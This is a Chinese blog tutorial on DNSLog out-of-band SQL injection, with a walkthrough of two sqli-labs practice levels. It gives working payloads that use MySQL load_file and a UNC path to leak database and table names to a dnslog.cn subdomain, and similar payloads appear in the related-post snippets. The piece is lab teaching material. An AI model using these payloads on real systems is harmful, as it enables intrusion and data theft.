SQL注入之DnsLog注入

已于 2023-03-24 11:27:02 修改
阅读量1.8k 收藏 16
点赞数 4
文章标签: sql 数据库 网络安全 web安全
于 2023-03-22 18:17:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52310755/article/details/129715950
版权

一、原理

DnsLog注入可以理解成是一种技巧,而不是一种攻击方式,是一种让无回显的攻击,变得有回显的方式,包括但不限于SQL盲注,下面以盲注为例,需要有盲注的基础。

在解释原理之前,首先了解一下几样东西,如下:

1. load_file函数

Mysql数据库的load_file()函数不单可以读取本地文件,还可以通过UNC路径访问远程文件

DnsLog注入就是利用load_file()函数访问远程文件的特点,对延时盲注等无回显的注入或其他无回显的攻击带来回显。

2. UNC路径

UNC路径格式://servername/sharename/directory/filename

UNC路径就是类似上面这样形式的网络路径。它符合//servername/sharename 格式

  • servername 是服务器名或者域名

  • sharename 是共享资源的名称

UNC 名称可以包括共享名称下的目录路径 /directory/filename

实例及解读: //xclay.net/share/张三/账单.docs

如果访问上述UNC路径的话,就会得到xclay.net 服务器share共享文件夹下的张三文件夹下的账单.docs文件

3. DNS解析

网上找到一张解释DNS解析过程非常通透的图片:

f600c2cd-0986-496c-98ef-6acb995e8a87

上面这个例子:本地DNS服务器会依次询问 根、.cn、.com.cn、.cloudcrowd.com.cn 逐步获得结果

正常来讲每个查询记录都会在相应DNS服务器上留下相关的查询日志,一般来说企业或者自己部署的DNS在上图标红位置处,可以查到我们的DNS解析记录(我们向谁查了什么样的域名) 简单粗暴一点可以这么理解。

4. 原理

先看一段payload

and load_file(concat("//",database(),".dfnyy4.dnslog.cn/123")) -- clay

通过concat函数来构造UNC路径,并带出我们想要的查询结果
concat("//",database(),".dfnyy4.dnslog.cn/123")

123是为了构造UNC路径("//servername/share")随便写的: 
"//数据库名.dfnyy4.dnslog.cn/123"

所以我们只要查看查询 .dfnyy4.dnslog.cn 的DNS日志就能够看到整个回显

直接查看DNS日志比较困难,但网上有很多现成的平台:

原理:

load_file(UNC路径) 远程访问UNC路径中主机的地址,如果是域名将会进行解析并留下记录,通过查看DNS解析记录(DNS日志)来达到有回显的目的。

5. 条件

secure_file_priv值必须为空,否则没办法

d864c2ba-1048-49b0-8c5c-a232fb252bd6

二、实验

1. sqli-lab less8 布尔盲注

特征: 只有错误和正常两种回显,单引号闭合

9d8d66bf-c134-4e6e-b727-a9ec35fe8e42

24600dc5-3d86-47b1-8df3-413c199c2b54

获取域名:

访问 DnsLog 获得一个域名:

4ecc96c6-e299-494e-ad50-f0610a1c3e47

payload:

1' and load_file(concat("//",database(),".u9zk6s.dnslog.cn/123")) -- clay

获取回显

访问

c351daeb-35cf-494b-ba62-ebf8a8f3ee4c

Dnslog 刷新

1f8b8126-3b58-4b50-a6f0-05a871afed17

2. sqli-lab less9 延时盲注

特征: 单引号闭合延时盲注

f39637cb-517a-4a42-bbd4-59cf6885161a

payload:

1' and load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.u9zk6s.dnslog.cn/123')) -- clay

98ed52ce-6aaf-4a35-af96-963a9cd451d1

Ps:如果paylaod没有问题但一直刷新不出来可能是谷歌浏览器的问题,换个浏览器访问一下就可以了

如果对你有所帮助拜托拜托点赞收藏加评论666,更多文章内容欢迎访问笔者博客 :xclay.net

xclay
关注
  • 4
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
26-5 SQL 注入攻击 - 利用dnslog带回回显信息范例
weixin_43263566的博客
03-14 226
因此,这个 payload 的目的是利用 SQL 注入漏洞,尝试加载指定路径下的文件内容,并将结果返回给攻击者。这个 payload 旨在利用盲注漏洞来执行 SQL 查询,通过。目标:使用 DVWA 的盲注作为靶机,获取数据库信息。函数加载数据库中的内容,并将结果返回给攻击者。
SQL注入DNSLog外带注入
dragon的博客
02-21 2377
什么是dnslog呢?DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。所以在此就推荐两个平台,可以快速让我们使用dnslog外带注入也可以使用BurpSuite同样可以实现相应功能。
DNSlog注入(利用DNSlog平台将SQL盲注变成回显注入
柠檬i的博客
08-07 1051
DNSlog注入是一种利用DNS服务器记录域名解析请求的特性,来获取SQL注入结果的技术。它的原理是通过构造一个包含数据库信息的子域名,然后使用MySQL的load_file函数或其他方法,让目标服务器向DNS服务器发起解析请求,从而在DNS服务器上留下注入结果的痕迹。
SQL 注入天书.pdf
08-06
SQL 注入学习天书
sql注入攻击流量情况
07-18
sql注入攻击流量情况
SQL注入——DNSLOG注入
qq_52263650的博客
11-17 696
SQL注入——DNSlog注入
dnslogsql注入
weixin_44894463的博客
07-09 226
前两天看到了一个骚姿势,没有回显的时候利用dnslog来得到数据库名等。 可以在一个网站上注册ceye.io,注册就可以得到一个二级域名。 用到了load_file() ,用法是load_file(文件名),比如这样:select load_file(concat(’\\’,database(),’.xxxx.ceye.io\fwafw’)); 这个就相当于访问了table_schema.xxx...
SQL DNSlog注入详解
永远是少年
08-07 1306
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL DNSlog注入。 一、SQL DNSlog注入简介 二、SQL DNSlog注入实战
sql 注入 Dnslog
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-12 318
通常我们面对SQL注入过程中没有回显的情况下,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度,也许你也可以使用代理池。。。
SQL注入DNSlog注入
zh的博客
10-12 813
靶场地址:http://61.136.208.14:8003/ 解题准备:DNSlog平台 解题思路: 1、根据提示,需要使用dnslog平台进行注入 DNSLog Platform 生成并复制域名 2、然后判断靶场的闭合符 id=1 页面正常 id=1' id=1' --+ 报错 id=1 and 1=1 页面正常 id=1 and 1=2 页面不正常 确定没有闭合符,应该是数字型 根据DNSlog注入的通用语句,构建注入语句 ?id=1 and (select load_
pangolinsdl—sql注入工具
06-20
pangolinsdl—sql注入工具 很好用的sql注入工具 界面简洁好用 使用方便
sql注入资料.zip
最新发布
04-17
QL注入SQL Injection)是一种针对数据库驱动的应用程序的安全漏洞攻击技术。攻击者通过在应用程序的输入字段中插入或“注入”恶意的SQL代码,从而实现对数据库的非法访问和操作。SQL注入不仅可能导致数据泄露、数据篡改等严重后果,还可能使攻击者获得对系统的完全控制。因此,深入理解SQL注入的原理、危害,以及采取有效的防范措施,对于保障数据库安全至关重要。SQL注入攻击的原理在于利用应用程序对用户输入的验证不足或处理不当。当应用程序将用户输入直接拼接到SQL查询语句中时,攻击者就可以通过构造特定的输入来改变SQL语句的结构和语义,从而执行恶意的操作。 SQL注入攻击的危害主要表现在以下几个方面: 数据泄露:攻击者可以通过SQL注入获取数据库中的敏感信息,如用户密码、个人信息、财务数据等。 数据篡改:攻击者可以修改数据库中的数据,破坏数据的完整性和准确性。 系统控制:通过SQL注入,攻击者可能获得对数据库服务器的完全控制,进而控制整个系统。 拒绝服务:攻击者可以利用SQL注入发起大量的恶意请求,导致数据库服务器过载,从而造成拒绝服务攻击(DoS)。
SQL Server 2005中的外联结用法
09-10
主要介绍了SQL Server 2005中的外联结用法 ,需要的朋友可以参考下
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
dnslog server
09-08
dnslog server
SQL注入-DNSlog注入(手工加工具使用)
BING
04-17 6596
DNSlog注入
SQL注入DNS_log注入
weixin_47785246的博客
07-11 731
SQL注入DNS_log注入 这篇文章将系统的讲解,SQL注入中的DNS_log注入的原理、方法、以及靶场练习writeup。 文章目录SQL注入DNS_log注入前言一、DNS_log注入原理二、靶场实战1.DNSlog 平台2.封神台靶场总结 前言 关于SQL注入的详细内容请看我之前写的文章 提示:以下是本篇文章正文内容,下面案例可供参考 一、DNS_log注入原理 我们都知道,DNS解析是一种用户访问域名时,客户端向DNS发起DNS查询的到目标服务器ip地址,进而实现通信的机制,而
dnslogsql注入中的应用
whatday的专栏
07-23 690
目录 1.DNSLOG的原理 2.Dnslog在常见数据库SQL注入的实战 1、MySQL 2、msSQL 3、postgreSQL 4、Oracle 3.总结 1.DNSLOG的原理 DNS的解析是递归与迭代相结合的,下面给出了当我们访问www.cloudcrowd.com.cn时, DNS的解析过程示意图 其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。
sql注入外带dnslog
09-11
很抱歉,我不能提供关于SQL注入外带DNS log的任何信息。 SQL注入是一种安全漏洞,允许攻击者通过在应用程序中插入恶意SQL代码来获取未经授权的访问权限或者对数据库进行操纵。这是一种严重的漏洞,应该被尽快修复。如果你担心你的应用程序存在SQL注入漏洞,请立即与相关安全团队或专业人员联系以修复该问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值